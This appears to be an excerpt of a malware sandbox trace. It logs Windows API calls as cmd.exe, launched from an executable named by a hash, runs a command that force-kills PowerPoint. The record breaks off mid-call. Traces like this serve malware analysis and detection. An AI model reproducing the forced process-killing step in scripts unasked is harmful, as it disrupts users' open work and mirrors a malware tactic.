GetConsoleOutputCP () returned 0x1b5 [0216.312] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0216.312] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0216.312] _get_osfhandle (_FileHandle=1) returned 0x158 [0216.312] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0216.312] _get_osfhandle (_FileHandle=1) returned 0x158 [0216.312] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0216.312] _get_osfhandle (_FileHandle=0) returned 0x154 [0216.312] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0216.312] GetEnvironmentStringsW () returned 0x657cc0* [0216.313] GetProcessHeap () returned 0x650000 [0216.313] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa1a) returned 0x6586e8 [0216.313] FreeEnvironmentStringsA (penv="A") returned 1 [0216.313] GetProcessHeap () returned 0x650000 [0216.313] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4) returned 0x650550 [0216.313] GetEnvironmentStringsW () returned 0x657cc0* [0216.313] GetProcessHeap () returned 0x650000 [0216.313] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa1a) returned 0x659110 [0216.313] FreeEnvironmentStringsA (penv="A") returned 1 [0216.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0216.313] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0216.313] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.314] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0216.314] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.314] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.314] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.314] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0216.314] RegCloseKey (hKey=0x88) returned 0x0 [0216.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0216.322] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0216.322] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.322] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0216.322] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.322] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.322] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0216.322] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0216.322] RegCloseKey (hKey=0x88) returned 0x0 [0216.323] time (in: timer=0x0 | out: timer=0x0) returned 0x62344246 [0216.323] srand (_Seed=0x62344246) [0216.323] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im powerpnt.exe \"" [0216.323] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im powerpnt.exe \"" [0216.323] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0216.323] GetProcessHeap () returned 0x650000 [0216.323] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x659b38 [0216.323] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x659b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0216.323] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0216.323] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0216.323] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.323] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.323] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.323] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.323] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.323] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.323] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.323] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.324] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.324] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.324] GetProcessHeap () returned 0x650000 [0216.324] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x6586e8) returned 1 [0216.324] GetEnvironmentStringsW () returned 0x657cc0* [0216.325] GetProcessHeap () returned 0x650000 [0216.325] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa32) returned 0x65a790 [0216.325] FreeEnvironmentStringsA (penv="A") returned 1 [0216.325] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0216.325] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.325] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.325] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.325] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.325] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.325] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.325] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.325] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.325] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.325] GetProcessHeap () returned 0x650000 [0216.326] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x44) returned 0x6505c8 [0216.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0216.326] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0216.326] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0216.326] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x650618 [0216.327] FindClose (in: hFindFile=0x650618 | out: hFindFile=0x650618) returned 1 [0216.327] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x650618 [0216.327] FindClose (in: hFindFile=0x650618 | out: hFindFile=0x650618) returned 1 [0216.327] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0216.327] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x650618 [0216.327] FindClose (in: hFindFile=0x650618 | out: hFindFile=0x650618) returned 1 [0216.327] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0216.328] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0216.328] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0216.328] GetProcessHeap () returned 0x650000 [0216.328] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x65a790) returned 1 [0216.328] GetEnvironmentStringsW () returned 0x657cc0* [0216.328] GetProcessHeap () returned 0x650000 [0216.328] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xa76) returned 0x659d50 [0216.328] FreeEnvironmentStringsA (penv="=") returned 1 [0216.328] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0216.328] GetProcessHeap () returned 0x650000 [0216.328] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x6505c8) returned 1 [0216.329] GetProcessHeap () returned 0x650000 [0216.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400e) returned 0x65bc50 [0216.329] GetProcessHeap () returned 0x650000 [0216.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4c) returned 0x65a7d0 [0216.329] GetProcessHeap () returned 0x650000 [0216.329] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4008) returned 0x65fc68 [0216.330] GetProcessHeap () returned 0x650000 [0216.330] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x4008) returned 0x663c78 [0216.331] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0216.331] GetProcessHeap () returned 0x650000 [0216.331] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x418) returned 0x65a828 [0216.332] SetErrorMode (uMode=0x0) returned 0x8003 [0216.332] SetErrorMode (uMode=0x1) returned 0x0 [0216.332] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x65a830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0216.332] SetErrorMode (uMode=0x8003) returned 0x1 [0216.332] GetProcessHeap () returned 0x650000 [0216.332] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x65a828, Size=0x7e) returned 0x65a828 [0216.332] GetProcessHeap () returned 0x650000 [0216.332] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x65a828) returned 0x7e [0216.332] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0216.332] GetProcessHeap () returned 0x650000 [0216.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x62) returned 0x65a8b0 [0216.332] GetProcessHeap () returned 0x650000 [0216.332] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb8) returned 0x65a920 [0216.332] GetProcessHeap () returned 0x650000 [0216.332] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x65a920, Size=0x62) returned 0x65a920 [0216.333] GetProcessHeap () returned 0x650000 [0216.333] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x65a920) returned 0x62 [0216.333] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0216.333] GetProcessHeap () returned 0x650000 [0216.333] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe0) returned 0x65a990 [0216.337] GetProcessHeap () returned 0x650000 [0216.337] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x65a990, Size=0x76) returned 0x65a990 [0216.337] GetProcessHeap () returned 0x650000 [0216.338] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x65a990) returned 0x76 [0216.338] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0216.338] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im powerpnt.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0216.339] GetLastError () returned 0x3 [0216.339] GetProcessHeap () returned 0x650000 [0216.339] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x65fc68) returned 1 [0216.339] GetProcessHeap () returned 0x650000 [0216.340] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x663c78) returned 1 [0216.340] GetProcessHeap () returned 0x650000 [0216.340] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x65bc50) returned 1 [0216.340] GetConsoleOutputCP () returned 0x1b5 [0216.344] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0216.344] GetUserDefaultLCID () returned 0x409 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0216.345] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0216.345] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.347] GetProcessHeap () returned 0x650000 [0216.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20c) returned 0x65aa58 [0216.347] GetConsoleTitleW (in: lpConsoleTitle=0x65aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0216.351] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0216.351] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0216.351] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0216.352] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0216.352] GetProcessHeap () returned 0x650000 [0216.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x65bc50 [0216.352] GetProcessHeap () returned 0x650000 [0216.353] RtlFreeHeap (HeapHandle=0x650000, Flags=0x0, BaseAddress=0x65bc50) returned 1 [0216.354] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0216.354] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0216.354] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0216.354] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0216.354] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0216.354] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0216.354] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0216.354] GetProcessHeap () returned 0x650000 [0216.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x58) returned 0x65ac70 [0216.354] GetProcessHeap () returned 0x650000 [0216.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x1a) returned 0x650578 [0216.355] GetProcessHeap () returned 0x650000 [0216.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x34) returned 0x65acd0 [0216.356] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0216.362] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0216.363] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0216.363] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0216.363] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0216.363] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0216.363] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0216.363] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0216.363] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0216.363] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0216.363] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0216.363] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0216.363] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0216.363] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0216.363] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0216.363] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0216.363] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0216.364] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0216.364] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0216.364] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0216.364] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0216.364] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0216.364] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0216.364] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0216.364] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0216.364] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0216.364] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0216.364] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0216.364] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0216.364] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0216.364] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0216.364] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0216.364] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0216.364] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0216.364] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0216.364] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0216.364] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0216.364] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0216.364] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0216.364] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0216.365] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0216.365] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0216.365] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0216.365] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0216.365] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0216.365] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0216.365] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0216.365] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0216.365] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0216.365] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0216.365] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0216.365] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0216.365] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0216.365] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0216.365] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0216.365] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0216.365] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0216.365] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0216.365] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0216.365] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0216.366] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0216.366] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0216.366] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0216.366] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0216.366] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0216.366] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0216.366] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0216.366] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0216.366] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0216.366] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0216.366] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0216.366] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0216.366] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0216.366] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0216.366] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0216.366] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0216.366] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0216.366] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0216.366] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0216.366] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0216.366] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0216.366] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0216.366] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0216.366] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0216.367] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0216.367] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0216.367] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0216.367] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0216.367] GetProcessHeap () returned 0x650000 [0216.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x65ad10 [0216.367] GetProcessHeap () returned 0x650000 [0216.367] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x46) returned 0x65af28 [0216.367] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0216.368] GetProcessHeap () returned 0x650000 [0216.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x418) returned 0x6505c8 [0216.368] SetErrorMode (uMode=0x0) returned 0x8003 [0216.368] SetErrorMode (uMode=0x1) returned 0x0 [0216.368] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6505d0, lpFilePart=0x19f57c | out: 